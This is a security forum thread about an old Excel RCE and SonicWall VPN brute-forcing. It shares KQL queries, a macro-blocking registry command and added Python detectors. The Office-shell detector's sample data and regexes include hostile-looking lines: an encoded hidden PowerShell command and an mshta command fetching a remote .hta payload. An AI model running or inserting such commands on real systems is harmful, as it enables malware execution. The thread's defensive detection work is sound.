ThreatsDay Debrief: Ancient Excel RCEs & SonicWall Brute-Force
Morning everyone. Just catching up on the ThreatsDay Bulletin. While the Defender 'BlueHammer' 0-day is getting the spotlight (and rightfully so), I'm actually more concerned about the report of a 17-year-old Excel RCE that just dropped.
A 17-year-old bug? In 2026? It really highlights how much 'technical debt' lives inside our file parsers. If you have legacy macros or internal tools built on older Excel APIs running in compatibility mode, you might want to audit them immediately. Threat actors are dusting off exploits for logic flaws that everyone forgot existed.
On top of that, we're seeing a massive wave of SonicWall brute-force attacks. It appears to be a widespread credential-stuffing campaign targeting SSL-VPN services.
If you're running a SonicWall appliance, I'd recommend throwing this logic into your SIEM to detect the spike:
CommonSecurityLog
| where DeviceVendor == "SonicWall"
| where DeviceProduct == "SonicOS"
| where Activity == "VPN Login" // Activity text is firmware/connector specific; confirm it against a sample row
| project TimeGenerated, SourceIP, DestinationIP, DeviceAction, EventOutcome // CommonSecurityLog has no ResultCode column; the CEF outcome key lands in EventOutcome
| summarize count() by SourceIP, bin(TimeGenerated, 5m) // counts successes and failures alike; filter on EventOutcome first if you only want failures
| where count_ > 10 // Threshold adjustment required based on your baselines
Is anyone else seeing a spike in VPN auth failures today, or are we just lucky?
We saw the SonicWall activity starting around 0200 UTC. The user-agents are spoofing standard browsers, but the request patterns are clearly automated. We pushed a 'deny all' rule for Geo-IPs we don't do business with and it stopped immediately. It feels like they are probing for weak MFA implementations.
Regarding the Excel bug, this feels like a replay of the Follina drama (CVE-2022-30190) but with even older tech. We've started blocking legacy macros via GPO entirely:
# Blocks macros in files carrying Mark of the Web. The GPO-managed equivalent lives under HKCU:\Software\Policies\Microsoft\Office\16.0\Excel\Security; the key must already exist or Set-ItemProperty fails.
Set-ItemProperty -Path "HKCU:\Software\Microsoft\Office\16.0\Excel\Security" -Name "BlockContentExecutionFromInternet" -Value 1 -Type DWord
It breaks a few internal reports, but it's better than a 17-year-old RCE.
From a pentesting perspective, 'ancient' bugs are the most lucrative. Clients often patch the new CVEs from Patch Tuesday but forget that their legacy finance app still relies on a DLL from 2008. If you haven't done an asset inventory recently, now is the time.
Pete’s GPO approach is solid, but don't sleep on the SonicWall vector. My honeypots are seeing attackers chaining the VPN brute-force with specific user-agent strings to bypass simple WAFs.
To catch the slow-and-low attempts Omar mentioned, try correlating auth failures over short windows with this KQL snippet:
CommonSecurityLog
| where DeviceVendor == "SonicWall"
| where Activity == "VPN Login"
| summarize Failures = countif(EventOutcome =~ "failure") by SourceIP, bin(TimeGenerated, 10m) // LogonResult is not a CommonSecurityLog column; EventOutcome (or DeviceAction/Message) carries the result, so check the value your connector emits
| where Failures > 5
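The two KQL snippets above (the OP's 5-minute bin count and the 10-minute failure count) both do fixed-window counting, which a low-and-slow attacker can slide under. The following is an added example, not code from the thread or from SonicWall: it parses constructed SonicWall-style CEF VPN login lines and runs both the fixed-bin check and a sliding-window check over them. The CEF signature IDs, Activity text and the outcome= key are assumptions for the sample data; adjust the parser to whatever your own feed emits.

```python
"""Brute-force and low-and-slow detection over SonicWall-style CEF VPN login lines.

Added example (not from the original thread). All log lines below are
constructed; field names (event name, outcome= key, signature IDs) are
assumptions and will differ on a real appliance.
"""
import re
from collections import defaultdict, deque
from datetime import datetime, timedelta, timezone

T0 = datetime(2026, 1, 1, 2, 0, tzinfo=timezone.utc)  # the 0200 UTC start mentioned in the thread


def make_line(ts, src, user, ok):
    """Build a constructed CEF line; rt= is epoch milliseconds."""
    name = "SSL VPN login succeeded" if ok else "SSL VPN login failed"
    sig = "1000" if ok else "1001"  # constructed signature IDs, not real SonicOS event IDs
    return (f"CEF:0|SonicWall|SonicOS|7.0.1|{sig}|{name}|5|"
            f"rt={int(ts.timestamp() * 1000)} src={src} suser={user} "
            f"outcome={'success' if ok else 'failure'}")


# Constructed sample: a noisy burst (15 failures in under 2 minutes), a low-and-slow
# source (one failure every 4 minutes for half an hour) and a legitimate user.
SAMPLE_LINES = (
    [make_line(T0 + timedelta(seconds=8 * i), "203.0.113.10", f"user{i}", False) for i in range(15)]
    + [make_line(T0 + timedelta(minutes=4 * i), "198.51.100.7", "jsmith", False) for i in range(8)]
    + [make_line(T0 + timedelta(minutes=1), "192.0.2.5", "alice", True),
       make_line(T0 + timedelta(minutes=7), "192.0.2.5", "alice", False),
       make_line(T0 + timedelta(minutes=8), "192.0.2.5", "alice", True)]
)

HEADER_RE = re.compile(r"^CEF:0\|([^|]*)\|([^|]*)\|([^|]*)\|([^|]*)\|([^|]*)\|([^|]*)\|(.*)$")
EXT_RE = re.compile(r"(\w+)=(.*?)(?=\s+\w+=|$)")


def parse_cef(line):
    """Split a CEF line into header fields plus extension key/values.
    Simplified: does not handle '\\|' escapes inside the header."""
    m = HEADER_RE.match(line)
    if not m:
        return None
    vendor, product, version, sig, name, sev, ext = m.groups()
    return {"vendor": vendor, "product": product, "name": name, **dict(EXT_RE.findall(ext))}


def vpn_failures(lines):
    """Return (timestamp, source_ip, user) for every failed SonicWall VPN login, sorted by time."""
    out = []
    for line in lines:
        ev = parse_cef(line)
        if not ev or ev["vendor"] != "SonicWall" or ev["product"] != "SonicOS":
            continue
        if "login" not in ev["name"].lower() or ev.get("outcome") != "failure":
            continue
        ts = datetime.fromtimestamp(int(ev["rt"]) / 1000, tz=timezone.utc)
        out.append((ts, ev["src"], ev.get("suser", "")))
    return sorted(out)


def burst_sources(failures, window=timedelta(minutes=5), threshold=10):
    """Fixed bins, like summarize ... by SourceIP, bin(TimeGenerated, 5m) | where count_ > threshold."""
    bins = defaultdict(int)
    w = window.total_seconds()
    for ts, src, _ in failures:
        bin_start = datetime.fromtimestamp((ts.timestamp() // w) * w, tz=timezone.utc)
        bins[(src, bin_start)] += 1
    return {k: n for k, n in bins.items() if n > threshold}


def low_and_slow_sources(failures, window=timedelta(minutes=30), threshold=5):
    """Sliding window per source: flag a source the first time more than `threshold`
    failures fall inside any `window`, regardless of bin boundaries."""
    recent = defaultdict(deque)
    flagged = {}
    for ts, src, _ in failures:  # `failures` is sorted, so the deque stays time-ordered
        q = recent[src]
        q.append(ts)
        while q and ts - q[0] > window:
            q.popleft()
        if len(q) > threshold and src not in flagged:
            flagged[src] = ts
    return flagged


if __name__ == "__main__":
    fails = vpn_failures(SAMPLE_LINES)
    for (src, start), n in burst_sources(fails).items():
        print(f"burst  {src}: {n} failures in bin starting {start:%H:%M}")
    for src, when in low_and_slow_sources(fails).items():
        print(f"slow   {src}: crossed threshold at {when:%H:%M:%S}")
```

Run against the constructed sample, the fixed 5-minute bin only catches the burst source; the slow source never puts more than two failures into any single bin and is only caught by the sliding window. The same gap applies to the KQL bin() approach, so pair a short-bin spike rule with a longer-window failure count.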
Valid point on the technical debt. While blocking macros is crucial, detection is key for file-based attacks. You can query for suspicious child processes spawned by Excel, specifically looking for command-line arguments often abused in these legacy exploits.
DeviceProcessEvents
| where InitiatingProcessFileName has "excel.exe"
| where FileName in~ ("cmd.exe", "powershell.exe")
| project Timestamp, DeviceName, FileName, ProcessCommandLine
This helps catch instances where a malicious document bypasses the macro block or uses a different vector.
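To show what the DeviceProcessEvents query above looks like when run offline and enriched with the argument checks it alludes to, here is an added example (not code from the thread or from Microsoft). The events are constructed records with the same column names; the parent list beyond excel.exe, the child list beyond cmd.exe/powershell.exe and the argument patterns are this example's own generalizations, not something the thread states.

```python
"""Hunt for Office-spawned shells in endpoint process events.

Added example (not from the original thread). Records mimic the
DeviceProcessEvents columns used in the KQL above; every event is constructed.
"""
import re

# Generalized beyond the thread's excel.exe -> cmd.exe/powershell.exe pairing (assumption).
OFFICE_PARENTS = {"excel.exe", "winword.exe", "powerpnt.exe"}
SHELL_CHILDREN = {"cmd.exe", "powershell.exe", "pwsh.exe", "mshta.exe",
                  "wscript.exe", "cscript.exe", "rundll32.exe", "regsvr32.exe"}

# Command-line traits commonly seen in document-delivered stagers.
ARG_PATTERNS = {
    "encoded_command": re.compile(r"(?:^|\s)-e(?:nc(?:odedcommand)?)?\s+[A-Za-z0-9+/=]{20,}", re.I),
    "download_cradle": re.compile(r"downloadstring|downloadfile|invoke-webrequest|\biwr\b|certutil.*-urlcache", re.I),
    "url": re.compile(r"https?://", re.I),
    "hidden_window": re.compile(r"-w(?:indowstyle)?\s+hidden", re.I),
    "no_profile": re.compile(r"-nop\b|-noprofile", re.I),
}

SAMPLE_EVENTS = [  # constructed sample records
    {"Timestamp": "2026-01-01T09:12:03Z", "DeviceName": "FIN-WS-07",
     "InitiatingProcessFileName": "EXCEL.EXE", "FileName": "powershell.exe",
     "ProcessCommandLine": "powershell.exe -nop -w hidden -enc SQBFAFgAIAAoAE4AZQB3AC0ATwBiAGoAZQBjAHQA"},
    {"Timestamp": "2026-01-01T09:15:41Z", "DeviceName": "FIN-WS-07",
     "InitiatingProcessFileName": "excel.exe", "FileName": "cmd.exe",
     "ProcessCommandLine": "cmd.exe /c whoami"},
    {"Timestamp": "2026-01-01T09:20:00Z", "DeviceName": "HR-WS-02",
     "InitiatingProcessFileName": "winword.exe", "FileName": "mshta.exe",
     "ProcessCommandLine": "mshta.exe http://203.0.113.50/p.hta"},
    {"Timestamp": "2026-01-01T09:21:17Z", "DeviceName": "IT-WS-01",
     "InitiatingProcessFileName": "explorer.exe", "FileName": "powershell.exe",
     "ProcessCommandLine": "powershell.exe -File C:\\scripts\\inventory.ps1"},
    {"Timestamp": "2026-01-01T09:25:09Z", "DeviceName": "FIN-WS-07",
     "InitiatingProcessFileName": "excel.exe", "FileName": "splwow64.exe",
     "ProcessCommandLine": "splwow64.exe 12288"},
]


def assess(ev):
    """Return the reasons an event is suspicious, or [] if it is not.
    Names are lower-cased to mirror KQL's case-insensitive in~ / =~ operators."""
    parent = ev["InitiatingProcessFileName"].lower()
    child = ev["FileName"].lower()
    if parent not in OFFICE_PARENTS or child not in SHELL_CHILDREN:
        return []
    reasons = [f"{parent} spawned {child}"]
    cmd = ev.get("ProcessCommandLine", "")
    reasons += [name for name, rx in ARG_PATTERNS.items() if rx.search(cmd)]
    return reasons


def hunt(events):
    """Apply the parent/child filter from the KQL, then rank hits by how many
    suspicious command-line traits each one carries."""
    hits = []
    for ev in events:
        reasons = assess(ev)
        if reasons:
            hits.append({"Timestamp": ev["Timestamp"], "DeviceName": ev["DeviceName"],
                         "FileName": ev["FileName"],
                         "ProcessCommandLine": ev.get("ProcessCommandLine", ""),
                         "Reasons": reasons, "Score": len(reasons)})
    return sorted(hits, key=lambda h: -h["Score"])


if __name__ == "__main__":
    for h in hunt(SAMPLE_EVENTS):
        print(f"{h['Score']}  {h['Timestamp']}  {h['DeviceName']}  {h['ProcessCommandLine']}")
        print("   " + ", ".join(h["Reasons"]))
```

The plain parent/child match is what the KQL above returns; the argument scoring is the triage step that lets an analyst open the encoded-command and URL cases first. Note that `has "excel.exe"` in the original query is a term match, so an exact comparison (`=~`) is the closer equivalent of the set membership test here.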